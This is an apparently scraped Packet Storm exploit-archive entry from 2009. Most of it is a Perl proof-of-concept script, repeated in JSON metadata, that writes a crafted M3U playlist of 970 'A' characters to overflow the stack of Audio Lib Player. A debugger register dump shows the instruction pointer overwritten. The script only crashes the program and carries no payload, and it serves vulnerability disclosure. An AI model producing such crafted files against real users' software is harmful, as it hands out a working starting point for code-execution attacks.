ID PACKETSTORM:79401
Type packetstorm
Reporter Cyber-Zone
Modified 2009-07-20T00:00:00
Description
`
#!/usr/bin/perl
#
#
#
# Audio Lib Player (M3U File) Local Stack Overflow PoC
#
# download : http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Greatz : All friends (Jiko :)) Sec-r1z.CoM r1z ... Todd and Packet Storm ;)
#
#olly
#EAX FFFFFFFF
#ECX 000038D9
#EDX 0012F70C
#EBX 00000068
#ESP 0012FF00
#EBP 41414141
#ESI 0012FF10
#EDI 00000008
#EIP 41414141
#
my $Header = "#EXTM3U\n";
my $ex="http://"."A" x 970; # Random
open(MYFILE,'>>cyber.m3u');
print MYFILE $Header.$ex;
close(MYFILE);
_________________________________________________________________
Avec Windows Live, vous organisez, retouchez et partagez vos photos.
http://www.microsoft.com/northafrica/windows/windowslive/products/photo-gallery-edit.aspx`
{"id": "PACKETSTORM:79401", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Audio Lib Player Stack Overflow", "description": "", "published": "2009-07-20T00:00:00", "modified": "2009-07-20T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/79401/Audio-Lib-Player-Stack-Overflow.html", "reporter": "Cyber-Zone", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:59", "viewCount": 1, "enchantments": {"score": {"value": 1.3, "vector": "NONE", "modified": "2016-11-03T10:22:59", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:59", "rev": 2}, "vulnersScore": 1.3}, "sourceHref": "https://packetstormsecurity.com/files/download/79401/alp-overflow.txt", "sourceData": "` \n#!/usr/bin/perl \n# \n# \n# \n# Audio Lib Player (M3U File) Local Stack Overflow PoC \n# \n# download : http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm \n# Found By : Cyber-Zone (ABDELKHALEK) \n# \n# \n# Greatz : All friends (Jiko :)) Sec-r1z.CoM r1z ... Todd and Packet Storm ;) \n# \n#olly \n#EAX FFFFFFFF \n#ECX 000038D9 \n#EDX 0012F70C \n#EBX 00000068 \n#ESP 0012FF00 \n#EBP 41414141 \n#ESI 0012FF10 \n#EDI 00000008 \n#EIP 41414141 \n# \nmy $Header = \"#EXTM3U\\n\"; \n \nmy $ex=\"http://\".\"A\" x 970; # Random \n \nopen(MYFILE,'>>cyber.m3u'); \n \nprint MYFILE $Header.$ex; \n \nclose(MYFILE); \n \n \n_________________________________________________________________ \nAvec Windows Live, vous organisez, retouchez et partagez vos photos. \nhttp://www.microsoft.com/northafrica/windows/windowslive/products/photo-gallery-edit.aspx`\n", "immutableFields": []}
{}